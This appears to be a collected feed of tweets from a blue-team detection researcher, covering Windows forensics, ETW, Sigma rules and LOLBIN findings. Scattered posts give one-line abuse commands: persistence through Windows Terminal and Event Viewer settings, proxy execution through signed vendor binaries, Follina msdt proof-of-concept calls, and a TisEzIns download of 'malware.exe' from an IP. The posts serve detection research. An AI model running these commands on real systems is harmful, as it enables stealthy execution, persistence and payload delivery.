Since everyone patches systems based on what infosec twitter is currently hyping. We should do a weekly hype for old vulnerabilities and pretend that they are new then maybe people will care.
Here is a stupid way to persist on a machine using WindowsTerminal profiles.
1-Modify the "settings.json" located in %localappdata% and add a custom profile that contains your payload
2-Change the "defaultProfile" value and put your GUID
3-Add the value "startOnUserLogin": true
If you have Symantec SEP installed you can use the "Symantec.SSHelper" COM object to launch processes and download arbitrary files.
The "User-Agent: Symantec Agent" can be used to identify requests made by the "HIDownloadURLFile"
In addition to the documented "-e/--exec" flag in
#lolbas
about the "wsl.exe" binary (). We can also use the "--system" flag to run Linux (as root) /Windows commands.
wsl --system [Command]
A quick DFIR tip for the weekend
Now that notepad on Win 11 saves its states and can open tabs. It means history is saved somewhere :)
Well that somewhere is in %localappdata%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState
A new location to monitor and…
By creating the key "telnet.exe" in the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" registry and setting the "Default" key to any executable. We can call it by running the command:
rundll32.exe url.dll,TelnetProtocolHandler
We need blue team people to start writing malware that can move laterally and persist and all that good shit but the payload is to enable PowerShell logging and install Sysmon 😂
If you have a
#Symantec
Endpoint Protection Manager (SEPM) instance installed. You can use the signed "WinExec" binary to launch arbitrary commands.
WinExec.exe "[InsertCommand]"
It'll execute the command(s) in question using "cmd.exe /c [Command]"
#lolbin
In this blog post, i take a look at some of the lesser known
#Windows
Event Log files and try to find interesting artifacts for
#DFIR
and
#ThreatHunting
Thanks for reading.
Feedback is really appreciated.
PowerShell has a list of suspicious keywords. If found in a script block an automatic 4104 event will be generated regardless of logging policy :) (True for both PWSH 5/7)
Look for EID 4104 with Level 3 (Warning)
Full List:
I created a new project called C2-Matrix-Indicators that aims to take a code review approach to extract detections/indicators out of the C2's listed in the
@c2_matrix
Feedback and contributions are highly appreciated.
LINK:
#BlueTeam
#detection
#infosec
[Blog📚] A Primer On Event Tracing For Windows (ETW)
In this blog i cover the following topics
- Introduction to ETW
- Provider Manifest Structure
- Tools and Techniques to Interact With ETW
#infosec
#blueteam
#windows
One thing I dislike about Windows file "properties". Is that it chose to hide or show some information depending on the extension of the file.
For example a ".cpl" has an original filename field but if you inspect it won't show it. Change the extension to ".dll" and its now…
msdt
#follina
run from CLI directly doesn't require the "IT_RebrowseForFile" nor "ms-msdt". See minimal POC below
msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Real life infosec reminder :
- Most companies dont have detection teams. At best AV with old sig.
- Servers are not updated every month. Most still have Win7 and 2008
- Most stuff is left in default config state.
- If they have 💰. Then, buy leader in Gartner and leave it as is.
First blog of 2021
Common Tools & Techniques Used By Threat Actors and Malware — Part I
If you're starting as a threat hunter or a detection engineer give this a read.
Feedback is appreciated.
#threathunting
#BlueTeam
#detection
#engineering
To get people into blue teaming. We need a series similar to Mr. Robot but the main character is a blue teamer/EDR admin. Deploying GPOs and answering support tickets and tuning FP.
Make that exciting Netflix😅
#Windows
Third-Party
#AppsForensics
Reference Guide provides a detailed exploration of artifacts from 46 third-party applications commonly found on devices running the Windows operating system.
Download:
Download in Portuguese:
As a detection engineer writing detections for a product. You'll face the reality that you need to write the same detection using multiple sources
- Security Log
- Sysmon
- PowerShell Scriptblock (if its powershell related)
- Kernel / EDR source
- ETW counterpart Kernel-Process…
Created a new repository that contains resources (blogs, slides, talks...) to learn and understand SIGMA Rules.
If you have any related resources please feel free to contribute.
#sigma
#detection
#infosec
#resources
MAL-CL has now coverage for more than 40+ different tools. Every tool has
➡️MITRE Mapping.
➡️Detections (Splunk, Sigma, Elastic, Azure) when possible.
➡️Common Command-lines
➡️Sandbox Execution & Event logs to monitor
And much more to come.
Github:
Here is a quick write-up for one of the most convoluted LOLBINs to setup.
StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems.
It calls to a function named "RunCommand" that directly allows the…
[New Blog] I just published "Symantec Endpoint Protection Meets COM — Using “Symantec.SSHelper” As A LOLBIN" detailing how I found the Symantec.SSHelper
#lolbin
and the many features it offers.
Feedback is appreciated as always 🙏
I'm here to remind you that the most underrated and slept on C2 is actually Merlin.
Been there for a long time and still have a very low detection rate across the board.
You all be underestimating the power of low detections with go based stuff.
Everyone gets a LOLBIN in this new blog post about some cool binaries I found that can be abused from AV uninstallers and their tooling. 📚
#lolbins
#lolbas
#windows
#blueteam
I feel many people should actually work in the front line of defense. With broken SIEMs, unmanaged and underpaid teams, missing logs, broken workflows...etc.
Many, and I mean many talk from their Ivory tower 6/7 figure job with the best, and taking one continent they live in or…
As we all know, true APTs and TAs avoid using "whoami" as its a sign of weakness.
So here is a thread of 14 examples of APTs and TAs executing it over the years.
MosesStaff By Checkpoint
1/🧵
The "PCW.debugreport.xml" file inside %localappdata%\Diagnostics and %localappdata%\ElevatedDiagnostics (for elevated instances) is generated when executing the
#follina
thingy and it contains the payload. Maybe good for
#dfir
Did anyone look into this?
Using the "Pcwrun" binary we can also trigger
#follina
as this will be equivalent to running
#msdt
with an answer file (See Image).
"Pcwrun /../../$(calc).exe" Will spawn "msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af %temp%\PCWXXXX.xml /skip TRUE"
#lolbin
We know from LOLBAS that adplus can be used to dump lsass (). But you can also use it to run arbitrary commands and binaries with the "-sc" flag.
#lolbin
#lolbas
adplus.exe -crash -o [OutputDir] -sc [Command]
[New Blog] I just published Symantec EDR Internals — Criterion
This is the first blog in a series where i'll dive into the internals of the detection technologies and mechanisms used by
@symantec
#EDR
Feedback is really appreciated.
MindMap I made a wile back covering some of the common windows system processes, their parent/child relationship and default behavior.
Link:
#Detection
#BlueTeam
#MalwareAnalysisTip
If you see the "/e:VBScript.Encode" flag in a command line. This "indicates" that the file is an encoded VBS
You can use the following tools to decode it :
1)
2)
Examples:
I'm really excited and delighted to share that I have joined
@nextronsystems
as Threat Researcher. Super stoked to work with
@cyb3rops
and the team and provide more blueness to the world 💙😁
🧙♂️Introducing SigmaHQ GUI 🧙♂️
This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules ->
Read more about the tool in this release blog ->
⚒️…
Took some time to put the discussion from the thread below into a more coherent and digestible format.
TL;DR - If you're interested how UWP and Windows desktop apps (store and other) are able to start on startup of windows without touching the Run key or any typical persistence…
@James_inthe_box
@Hexacorn
@joshlemon
Small update :)
While the tangent we went on was good, I think I found the real culprit.
WindowsApps (Appx) have a special key to create startup tasks. Its in "HKEY_CURRENT_USER\Software\Classes\Local…
Did you know that when you disable "Real-time protection" on defender, its true that you won't receive events on the Defender Event log anymore (related to that feature).
But if you actually subscribe to the AMSI ETW {2A576B87-09A7-520E-C21A-4942F0271D67} provider you'd still…
You can use the "Microsoft-Windows-Services-Svchost"
#ETW
provider to spot fake "svchost" processes as this provider will only track services started via the legitimate svchost. If it's not showing up then it's worth looking into.
#threathunting
#dfir
Following
@SwiftOnSecurity
amazing thread ().
I’ve compiled some the tools mentioned in it with their corresponding links in the thread below (For reference and easy find).
EDRs/AVs sometimes trust certain locations or perform certain behavior when met with unexpected weirdness. Here are some ideas to check/test for, the next time you have some alone time with your solution
1/🧵
I love it when threat actors are old-school users of Windows. Instead of traditional methods to enumerate local groups on a machine, the TA used the "local.exe" utility that's part of the "Windows 2000 Resource Kit Tools".
It's physically impossible to keep up with the research being released nowadays. Basically life becomes a mix of FOMO, Imposter Syndrome and eventual burnout😭
What's the solution you might ask? Welp it turns out, no one is actually keeping up with everything. 😂Everyone is…
[COMING SOON]
Atomic Red Team 🐦 Integration is coming to SigmaHQ 🧙♂️
Sigma rules will be validated regularly against atomics directly in the Sigma CI pipelines to ensure even more quality.
Will share more in time 🔥
If you use PowerShell 7. Know that logging is not in the usual "Microsoft-Windows-PowerShell/Operational" but instead in "PowerShellCore/Operational". That you need to enable. Use "RegisterManifest.ps1" and "InstallPSCorePolicyDefinitions.ps1" to get it
[Blog📚] Finding Detection and Forensic Goodness In ETW Providers
In this blog i take a look at some of the telemetry provided by the different ETW providers that can be used for detection/forensic investigations.
#BlueTeam
#ETW
#Windows
#dfir
I think it's high time we stopped fucking around and pretending security is working. We've been getting high severity vulnerabilities every couple of days for the last 6-7 months it's not even funny anymore.
No amount of 100% coverage will save you. So let's get a grip and stop…
In my stupid quest to find
#lolbin
's in any software, here is one that's part of the "Advanced Installer" software that conveniently has the description
"File that launches another file"
viewer.exe /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "Command" [Args]
It's also signed.
Persistence via Event Viewer help link😅using "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer\"
Add "MicrosoftRedirectionProgram" with your program and add "ConfirmUrl" to 1 to avoid prompt
Here is another signed
#lolbin
to proxy your execution through available with fresh VStudio installation. (C:\Program Files (x86)\Microsoft Visual Studio\20XX\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\osXX\)
#lolbas
OpenConsole.exe <Payload>
Here is a nice
#lolbas
#LOLScript
part of VStudio install (Launch-VsDevShell). Has n IEX call that accepts passed args via "-VsWherePath" and "-VsInstallationPath" flags. 🧵1/3
.\Launch-VsDevShell.ps1 -VsWherePath 'C:\Windows\System32\calc.exe'
#lolbin
If you're doing
#dfir
on a machine that has a WSL distro installed. Don't forget the check the "ext4.vhdx" for any susp activity intiated from there. Even on a live system you can open the file using 7Zip for example and check the ".bash_history" among other things :)
#detection
#follina
is patched but did you know you could use a .diagcab file with an embedded answer file. Then the only required flag becomes "/cab" (and one-click as I couldn't find how to skip the UI...🥲)
#lolbin
msdt /cab PCWDiagnostic.diagcab
One of the best things to invest in if you're building detections is to baseline server/service child processes.
More often than not, all entry vectors (RCE, Phish...etc) will spawn a "suspicious" child process.
From "java" and "tomcat" to "winword" and "svchost" 🧵
You can execute arbitrary Lua Scripts using
@FSecure
signed "Products Uninstallation Tool"(FsUninstallationTool.exe)
FsUninstallationTool.exe -s -p mdr --scripts [ScriptFolderLocation]
*Require "Administrator" to launch
#lolbin
#fsecure
Shocker news but if you're building detections don't focus on the new an shiny as it probably won't affect you. Instead prioritize building the fundamental of detection such as renamed sys binaries, susp child processes, exec form susp locations, etc. These will help you forever
Let's breakdown some easy [host-based] wins from the SNAKE report with some SIGMA detections.
#snakemalware
1- Persistence via Service [T1543.003] + Service Execution
I got a Work In Progress PR
@sigma_hq
based on this report. Targeting IOCs and different ideas mentioned here and there.
Follow this stream for a list of rules to hunt for this :)
[New Blog] Understanding & Detecting C2 Frameworks — Ares
In this new series. I'll be diving into and exploring different C2 frameworks. To offer some understanding and detection opportunities for out of the box usage and configurations.
The
@TheDFIRReport
is one of the best thing that happened to this industry. Providing extremely detailed reports with an extreme level of detail for every step. Showcasing what happens in the every day attacks that millions of people face.
The best part is that it keeps on…
News flash! Your built in EDR rules aren't enough and worst of all you can't even update or understand what they detect.
Some might say. I use validation method so I know what they're detecting. You're only confirming a subset of certain implementation of ttps. So check again.…
I've been playing with the "Microsoft-Windows-Search-Core" ETW provider and I found some interesting stuff regarding the "search-ms" thingy. So full queries are logged in EID 51. Exp running "search-ms:query=" from the Windows "Run" you get the following event. 🧵1/4
This is a thread compiling different threads, blogs, and help offered by the infosec community related to the current situation. If you have additional links put them here. 🧵
[Blog 🪡] In this new blog series I'm calling "Behind The Detection", I'll be sharing some tips and ideas on building detections using SIGMA.
In this introductory post, I take a look at some schtasks examples and give a taste of what's to come.
#blueteam
TisEzIns a binary bundled with Trend Micro installer that "Helps download the Trend Micro software installer" can be abused to download arbitrary files.
#lolbin
TisEzIns.exe /b /u "
http://IP/malware.exe"
/f "C:\path\to\save\malware.exe"
Read More:
I love how APTs use the latest and greatest zero days and bypasses for entry and persistence. And then you have rundll32 executing files from Windows\Temp with a .txt extension 😅 got bored in the middle of the operation.
[Blog] LOLBINed — Using Kaspersky Endpoint Security ‘KES’ Installer to Execute Arbitrary Commands
An interesting set of issues I found at the start of the year in the KES installer and related products.
Enjoy 😁